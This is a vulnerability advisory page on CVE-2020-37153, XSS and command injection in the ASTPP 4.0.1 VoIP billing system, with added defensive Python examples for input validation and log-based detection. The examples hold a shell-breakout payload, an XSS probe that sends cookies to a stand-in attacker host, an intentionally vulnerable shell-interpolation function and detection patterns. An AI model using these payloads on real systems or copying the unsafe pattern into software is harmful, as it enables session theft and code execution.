CVE-2020-37153
Published: 11 February 2026
Summary
CVE-2020-37153 is a critical-severity vulnerability in iNextrix ASTPP classified as Cross-site Scripting (CWE-79), although the underlying advisory covers a set of flaws in ASTPP 4.0.1 that also includes command injection. Its CVSS base score is 9.8 (Critical), a score that corresponds to unauthenticated remote code execution rather than to XSS on its own.
Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190). It ranks at the 38.7th percentile by exploit likelihood (below the median), it is not currently listed in the CISA KEV catalog, and a public proof-of-concept exploit is referenced.
The strongest mitigations our analysis identified are NIST 800-53 AC-3 (Access Enforcement) and SI-10 (Information Input Validation).
Threat & Defense Details
Mitigating Controls (NIST 800-53 r5) [AI]
- SI-2 (Flaw Remediation): directly removes the XSS and command injection flaws in ASTPP's SIP device configuration and plugin management interfaces by applying the vendor fix promptly.
- SI-10 (Information Input Validation): blocks command injection and XSS by validating and sanitizing all user input reaching the SIP device configuration and plugin management interfaces before it is used in a command or rendered in a page.
- AC-3 (Access Enforcement): requires authentication and authorization before the SIP device configuration and plugin management interfaces can be reached, closing the unauthenticated remote path to the flaws.
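What SI-10 looks like in code for the two flaw classes the page describes, as an added example that is not ASTPP's own code. The page places the flaws in the SIP device configuration and plugin management interfaces but names no parameters or backend commands, so the `device_name` field, the `echo` stand-in for the backend tool, and the payloads are constructed assumptions. The unsafe functions reproduce the vulnerable pattern (shell string interpolation, raw HTML reflection); the safe ones show allowlist validation with argv-style execution and contextual output encoding.

```python
import html
import re
import subprocess

# Added example, not ASTPP code. The page places the flaws in the SIP device
# configuration and plugin management interfaces but names no parameters, so
# the "device_name" field and the command built from it are assumptions;
# `echo` stands in for whatever backend tool a provisioning action invokes.

# SI-10 allowlist: a SIP peer name needs nothing outside this character set.
DEVICE_NAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,64}")

def is_valid_device_name(name: str) -> bool:
    """Accept only names matching the allowlist; never try to strip bad bytes."""
    return DEVICE_NAME_RE.fullmatch(name) is not None

def run_unsafe(device_name: str) -> str:
    """Vulnerable pattern: untrusted input interpolated into a shell command string."""
    cmd = f"echo 'sip show peer {device_name}'"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout

def run_safe(device_name: str) -> str:
    """Hardened: allowlist-validate, then pass arguments as argv with no shell."""
    if not is_valid_device_name(device_name):
        raise ValueError(f"rejected device name: {device_name!r}")
    argv = ["echo", f"sip show peer {device_name}"]
    return subprocess.run(argv, capture_output=True, text=True).stdout

def render_unsafe(device_name: str) -> str:
    """Vulnerable pattern: a stored name reflected into HTML verbatim."""
    return f"<td>{device_name}</td>"

def render_safe(device_name: str) -> str:
    """Hardened: HTML-encode for the text-node context it is rendered into."""
    return f"<td>{html.escape(device_name, quote=True)}</td>"

if __name__ == "__main__":
    # Constructed payloads: a shell breakout and a stored-XSS probe.
    breakout = "dev1'; echo INJECTED #"
    probe = "<script>new Image().src='http://attacker.invalid/?c='+document.cookie</script>"
    print(run_unsafe(breakout), end="")   # prints a second line, INJECTED
    try:
        run_safe(breakout)
    except ValueError as err:
        print(err)
    print(render_unsafe(probe))
    print(render_safe(probe))
```

The breakout payload closes the single-quoted argument, appends a second command and comments out the dangling quote; `run_unsafe` executes it, `run_safe` rejects it before any process is spawned. Rejecting rather than sanitizing is deliberate: a name that fails the allowlist has no legitimate use, and stripping metacharacters tends to leave a second encoding or quoting trick intact.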
MITRE ATT&CK Enterprise Techniques [AI]
Why these techniques?
The command injection is reachable without authentication through a public-facing web interface, so exploitation maps to Exploit Public-Facing Application (T1190) and the commands the attacker injects map to Unix Shell (T1059.004). The XSS enables administrator session hijacking; it is folded under T1190 here rather than mapped to a separate technique.
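A detection counterpart to the mapping above, as an added example that is not part of the page or of ASTPP: it scans web server access-log lines for the two payload shapes the page describes, shell metacharacters in a parameter (T1059.004) and HTML/script injection (XSS, reported under T1190). The page names no URL paths or parameters for the vulnerable interfaces, so the `/astpp/...` paths, the parameter names and the log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Added example, not ASTPP code. The page names no URL paths or parameters for
# the vulnerable interfaces, so the /astpp/... paths, parameter names and the
# log lines below are constructed for illustration.
SAMPLE_LOG = """\
203.0.113.7 - - [11/Feb/2026:10:01:02 +0000] "GET /astpp/sip_devices/edit?device_name=dev1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [11/Feb/2026:10:01:09 +0000] "GET /astpp/sip_devices/edit?device_name=dev1%27%3B+id+%23 HTTP/1.1" 200 640 "-" "curl/8.0"
203.0.113.7 - - [11/Feb/2026:10:01:15 +0000] "GET /astpp/plugins/config?name=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 300 "-" "curl/8.0"
203.0.113.7 - - [11/Feb/2026:10:01:21 +0000] "GET /astpp/plugins/config?name=%2524(id) HTTP/1.1" 200 300 "-" "curl/8.0"
"""

# Apache/nginx combined log format: client, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Shell metacharacters that separate or substitute commands (T1059.004).
SHELL_META = re.compile(r"[;|`\n]|\$\(|&&|\|\|")
# Markers of an HTML/JavaScript injection attempt (XSS, reported under T1190).
XSS_MARK = re.compile(r"<\s*script|\bon\w+\s*=|javascript:", re.IGNORECASE)

def classify_request(target: str) -> list[tuple[str, str, str]]:
    """Return (technique, parameter, decoded value) for each suspicious parameter."""
    findings = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        # parse_qsl decodes once; a second pass exposes double-encoded payloads
        # such as %2524 -> %24 -> $.
        decoded = unquote_plus(value)
        if SHELL_META.search(decoded):
            findings.append(("T1059.004", name, decoded))
        if XSS_MARK.search(decoded):
            findings.append(("T1190", name, decoded))
    return findings

def scan_log(text: str) -> list[dict]:
    """Run classify_request over every parsable request line and collect alerts."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = classify_request(m["target"])
        if findings:
            alerts.append({"ip": m["ip"], "ts": m["ts"], "status": m["status"],
                           "target": m["target"], "findings": findings})
    return alerts

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        for technique, param, decoded in alert["findings"]:
            print(f'{alert["ts"]} {alert["ip"]} {technique} param={param} value={decoded!r}')
```

Two caveats a practitioner will hit immediately. Access logs carry only the query string, so a payload delivered in a POST body (likely for a configuration form) is invisible here and needs request-body logging or an inline WAF. The patterns are heuristics: a 200 response to a flagged request is the signal worth escalating, because it means the application accepted the input rather than rejecting it.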
NVD Description
ASTPP 4.0.1 contains multiple vulnerabilities including cross-site scripting and command injection in SIP device configuration and plugin management interfaces. Attackers can exploit these flaws to inject system commands, hijack administrator sessions, and potentially execute arbitrary code with root permissions through cron task manipulation.
Deeper analysis [AI]
CVE-2020-37153 covers multiple vulnerabilities in ASTPP 4.0.1, including cross-site scripting (CWE-79) and command injection flaws within the SIP device configuration and plugin management interfaces. ASTPP is an open-source VoIP billing and provisioning system. The vulnerability carries a CVSS v3.1 base score of 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H): network-reachable, low attack complexity, no privileges or user interaction required, and high impact on confidentiality, integrity and availability.
Unauthenticated attackers can exploit these issues remotely over the network with low complexity and no user interaction required. Exploitation enables injection of system commands, hijacking of administrator sessions via cross-site scripting, and execution of arbitrary code with root permissions through manipulation of cron tasks, compromising confidentiality, integrity, and availability.
Advisories and related resources include the official ASTPP GitHub repository at https://github.com/iNextrix/ASTPP, the project website at https://www.astppbilling.org/, a proof-of-concept exploit on Exploit-DB at https://www.exploit-db.com/exploits/47889, and a VulnCheck advisory detailing ASTPP VoIP remote code execution at https://www.vulncheck.com/advisories/astpp-voip-remote-code-execution. Practitioners should consult these for mitigation guidance and patch details.
Details
- CWE(s)